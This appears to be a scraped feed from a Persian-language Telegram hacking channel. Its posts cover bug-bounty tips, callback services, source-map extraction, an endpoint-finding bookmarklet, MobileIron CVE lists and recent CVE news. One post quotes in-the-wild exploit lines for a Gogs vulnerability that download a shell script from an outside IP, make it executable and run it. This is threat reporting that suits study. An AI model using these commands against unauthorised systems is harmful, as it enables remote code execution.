znuqv
react-cve-03.py
برای دامین میتونید از این دوتا سرویس استفاده کنید
http://dnslog.cn/
https://app.interactsh.com/
این سایته هم دامین رایگان میده
https://requestbin.net/
http://dnslog.cn/
https://app.interactsh.com/
این سایته هم دامین رایگان میده
https://requestbin.net/
dnslog.cn
DNSLog Platform
DNSLog平台
❤6
Cve-2025-66516
دو سه روزه cve های جالبی میاد
https://thehackernews.com/2025/12/critical-xxe-bug-cve-2025-66516-cvss.html?m=1
دو سه روزه cve های جالبی میاد
https://thehackernews.com/2025/12/critical-xxe-bug-cve-2025-66516-cvss.html?m=1
❤9
Forwarded from Bug Bounty Diary
✎ The Anatomy of Source Maps and Reconstructing Original Source Code
A source map is a
Browsers use source maps to reconstruct original code automatically. Similarly, you can use tools like Sourcemapper to retrieve a website’s original source if the
References
• Introduction to JavaScript Source Maps
• Source maps: languages, tools
• Extracting JavaScript from Sourcemaps
#bugbounty #sourcemap #javanoscript
© T.me/BugBounty_Diary
A source map is a
.map file that links transformed code back to the original source, allowing browsers to display the original code in debuggers. For bug hunters, this is valuable because it makes reading code easier, reveals developer comments and ... .Browsers use source maps to reconstruct original code automatically. Similarly, you can use tools like Sourcemapper to retrieve a website’s original source if the
.map files are publicly accessible.sourcemapper -output dhubsrc -url https://target.com/js/client.356c1491.js.map
References
• Introduction to JavaScript Source Maps
• Source maps: languages, tools
• Extracting JavaScript from Sourcemaps
#bugbounty #sourcemap #javanoscript
© T.me/BugBounty_Diary
❤10
کد برای چک کردن پارامترها و فایل های js زیاده
این ui خوبی داره خوشم اومد
این ui خوبی داره خوشم اومد
javanoscript:(function(){var noscripts=document.getElementsByTagName("noscript"),regex=/(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g,jsRegex=/(?<=(\"|\'|\%60))(?:\/|https?:\/\/)[a-zA-Z0-9_?&=\/\-\#\.]+\.js(?:\?[^"'%60]*)?(?=(\"|\'|\%60))/g;const results=new Set;const paramMap=new Map();const jsFiles=new Set();function processContent(t,src){var e=t.matchAll(regex);for(let r of e){results.add(r[0]);var params=r[0].split('?')[1];if(params){params.split('&').forEach(param=>{var [key,]=param.split('=');if(key){if(!paramMap.has(key)){paramMap.set(key,[]);}paramMap.get(key).push(src||'Inline noscript or HTML');}});}}var j=t.matchAll(jsRegex);for(let r of j){jsFiles.add(r[0]);}}for(var i=0;i<noscripts.length;i++){var t=noscripts[i].src;if(t){jsFiles.add(t);fetch(t).then(function(t){return t.text()}).then(text=>processContent(text,t)).catch(function(t){console.log("An error occurred: ",t)});}else{processContent(noscripts[i].textContent);}}var pageContent=document.documentElement.outerHTML;processContent(pageContent,'Page content');function writeResults(){var div=document.createElement("div");div.style.cssText="position:fixed;top:0;left:0;width:100%;height:100%;background:#f0f8ff;color:#333;overflow:auto;z-index:9999;padding:20px;font-family:Arial,sans-serif;";var content="<h2 style='color:#4a69bd;'>Endpoints Found: " + results.size + "</h2>";content+="<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";content+=Array.from(results).map(endpoint=>{var fullUrl=endpoint.startsWith("http")?endpoint:window.location.origin+endpoint;return "<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + endpoint + "</div><div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'><a href='" + fullUrl + "' target='_blank' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + fullUrl + "</a></div>"}).join("");content+="</div>";content+="<h2 style='color:#4a69bd;margin-top:20px;'>Parameters Found:</h2>";content+="<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";paramMap.forEach((sources,param)=>{content+="<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + param + "</div><div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + sources.join('<br>') + "</div>";});content+="</div>";content+="<h2 style='color:#4a69bd;margin-top:20px;'>JS Files Found: " + jsFiles.size + "</h2>";content+="<div style='display:grid;grid-template-columns:1fr;gap:10px;'>";jsFiles.forEach(file=>{var fullUrl=file.startsWith("http")?file:window.location.origin+file;content+="<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'><a href='" + fullUrl + "' target='_blank' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + file + "</a></div>";});content+="</div>";div.innerHTML=content;var closeBtn=document.createElement("button");closeBtn.textContent="Close";closeBtn.style.cssText="position:fixed;top:10px;right:10px;background:#4a69bd;color:white;border:none;padding:10px 20px;cursor:pointer;";closeBtn.onclick=function(){document.body.removeChild(div);};div.appendChild(closeBtn);document.body.appendChild(div)}setTimeout(writeResults,3000);})();
❤9🔥4👍1
Forwarded from PentesterLand Academy - Public
در خصوص قرار دادم ماینر و بک دور یک پست کامل گذاشتم
https://www.instagram.com/reel/DSCKRvnjuNR/?igsh=MW1weDNqcjFzbGdweg==
https://www.instagram.com/reel/DSCKRvnjuNR/?igsh=MW1weDNqcjFzbGdweg==
Instagram
@pentesterland
خوشحالی که اسیب پذیری ها جدید رو با چند ساعت فاصله سریع فیکس میکنی و دیگه تهدیدی دنبالت نمیکنه؟ متاسفانه بیشترین تهدید همین طرز فکر است، سریعا راهکاری که تو ویدیو میگم رو دنبال کن که خدای نکرده دسترسی ه.کر روی سیستمت باقی نمانده و اپلیکیشن و بیزینست رو…
خوشحالی که اسیب پذیری ها جدید رو با چند ساعت فاصله سریع فیکس میکنی و دیگه تهدیدی دنبالت نمیکنه؟ متاسفانه بیشترین تهدید همین طرز فکر است، سریعا راهکاری که تو ویدیو میگم رو دنبال کن که خدای نکرده دسترسی ه.کر روی سیستمت باقی نمانده و اپلیکیشن و بیزینست رو…
❤9
Forwarded from #Silence[𝙒𝙀𝘽3]
این توضیحات نیاز بود
@logicalSilence
یکبار برای همیشه دربارهٔ هک توی WEB3 سعی کردم رودمپش و به شکل مختصر به تفاوتش با وب اپ هکینگ بپردازم
@logicalSilence
❤7🤣4👍1
👍6
❤14
ریپیتر توی کروم رو اگه نصب نکردید
این لینک اکستنشنش
https://chromewebstore.google.com/detail/rep+/dhildnnjbegaggknfkagdpnballiepfm
این لینک اکستنشنش
https://chromewebstore.google.com/detail/rep+/dhildnnjbegaggknfkagdpnballiepfm
❤11
MobileIron
یک پلتفرم برای مدیریت دستگاه های تلفن همراه برای سازمان هاست
ویژگیهای کلیدی MobileIron:
▫️Unified Endpoint Management (UEM)
▫️Zero Trust Security
▫️Mobile Threat Defense (MTD)
▫️Cross-Platform Management (iOS, Android, Windows, macOS)
▫️Containerization (Data Separation)
▫️Identity and Access Management (IAM)
▫️Automated Compliance and Remediation
▫️Per-App Secure VPN
▫️Comprehensive Reporting and Admin Dashboard
لیستی از مهمترین آسیبپذیریهای MobileIron:
▫️CVE-2023-35082: Remote Unauthenticated API Access Vulnerability (Score: 10.0)
▫️CVE-2023-35078: Remote Unauthenticated API Access Vulnerability / Authentication Bypass (Score: 9.8)
▫️CVE-2023-38035: API Authentication Bypass on Sentry Administrator Interface (Score: 9.8)
▫️CVE-2020-15505: Remote Code Execution (RCE) via Unspecified Vectors (Score: 9.8)
▫️CVE-2020-15506: Authentication Bypass (Score: 9.8)
▫️CVE-2020-15507: Arbitrary File Reading (Score: 7.5)
▫️CVE-2021-3540: Escaping Restricted Shell / Privilege Escalation (Score: N/A publicly listed, but impacts privilege)
#Service_hunting
@hackhaven_new
یک پلتفرم برای مدیریت دستگاه های تلفن همراه برای سازمان هاست
ویژگیهای کلیدی MobileIron:
▫️Unified Endpoint Management (UEM)
▫️Zero Trust Security
▫️Mobile Threat Defense (MTD)
▫️Cross-Platform Management (iOS, Android, Windows, macOS)
▫️Containerization (Data Separation)
▫️Identity and Access Management (IAM)
▫️Automated Compliance and Remediation
▫️Per-App Secure VPN
▫️Comprehensive Reporting and Admin Dashboard
لیستی از مهمترین آسیبپذیریهای MobileIron:
▫️CVE-2023-35082: Remote Unauthenticated API Access Vulnerability (Score: 10.0)
▫️CVE-2023-35078: Remote Unauthenticated API Access Vulnerability / Authentication Bypass (Score: 9.8)
▫️CVE-2023-38035: API Authentication Bypass on Sentry Administrator Interface (Score: 9.8)
▫️CVE-2020-15505: Remote Code Execution (RCE) via Unspecified Vectors (Score: 9.8)
▫️CVE-2020-15506: Authentication Bypass (Score: 9.8)
▫️CVE-2020-15507: Arbitrary File Reading (Score: 7.5)
▫️CVE-2021-3540: Escaping Restricted Shell / Privilege Escalation (Score: N/A publicly listed, but impacts privilege)
#Service_hunting
@hackhaven_new
❤7👍1
یدونه zero day برای Gogs اومده که خیلی بحاله
بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده
نیاز به یک یوزر عادی داره و No authentication نیست.
https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده
نیاز به یک یوزر عادی داره و No authentication نیست.
https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
wiz.io
Gogs Zero-Day RCE (CVE-2025-8110) Actively Exploited | Wiz Blog
Wiz Research discovered a Gogs zero-day (CVE-2025-8110) that bypasses a previous RCE fix via symlinks, leading to file overwrite and remote code execution.
❤6
Hack Haven
یدونه zero day برای Gogs اومده که خیلی بحاله بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده نیاز به یک یوزر عادی داره و No authentication نیست. https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
exploit
-دانلود فایل اتکر:
بجای اینکه به گیت وصل شه فایل رو دانلود میکنه
executable کردن فایل-
– اجرای شل
@hackhaven_new
-دانلود فایل اتکر:
sshCommand = wget http://106.53.108.81/123.sh -O /tmp/123.sh
بجای اینکه به گیت وصل شه فایل رو دانلود میکنه
executable کردن فایل-
sshCommand = chmod +x /tmp/123.sh
– اجرای شل
sshCommand = bash /tmp/123.sh
@hackhaven_new
❤5
Forwarded from PentesterLand Academy - Public
این فقط یک رودمپ ساده یا یک نقشه راه برای مبتدیان نیست، بلکه یک راهنمای اصولی براساس سطح شحص است، فرقی نمیکنه تازه بخوای شروع کنی و ه.کر بشی یا نه حتی سابقه کار داری یا باگ هانتر هستی، این پیام اینده کاریت رو بهتر خواهد کرد
نظرت رو راجب این پست باهام مطرح کن ❤️🔥
فرقی نمیکنه بخوای مهاجرت کنی یا فریلنسری کار کنی این پست مطمئنم بخشی از نیازت رو برطرف میکنه
https://www.instagram.com/reel/DSPnPq3jXcL/?igsh=emRvbjU3ZTRjc2Np
نظرت رو راجب این پست باهام مطرح کن ❤️🔥
فرقی نمیکنه بخوای مهاجرت کنی یا فریلنسری کار کنی این پست مطمئنم بخشی از نیازت رو برطرف میکنه
https://www.instagram.com/reel/DSPnPq3jXcL/?igsh=emRvbjU3ZTRjc2Np
Instagram
@pentesterland
این فقط یک رودمپ ساده یا یک نقشه راه برای مبتدیان نیست، بلکه یک راهنمای اصولی براساس سطح شحص است، فرقی نمیکنه تازه بخوای شروع کنی و ه.کر بشی یا نه حتی سابقه کار داری یا باگ هانتر هستی، این پیام اینده کاریت رو بهتر خواهد کرد
نظرت رو راجب این پست باهام مطرح…
نظرت رو راجب این پست باهام مطرح…
❤11👎1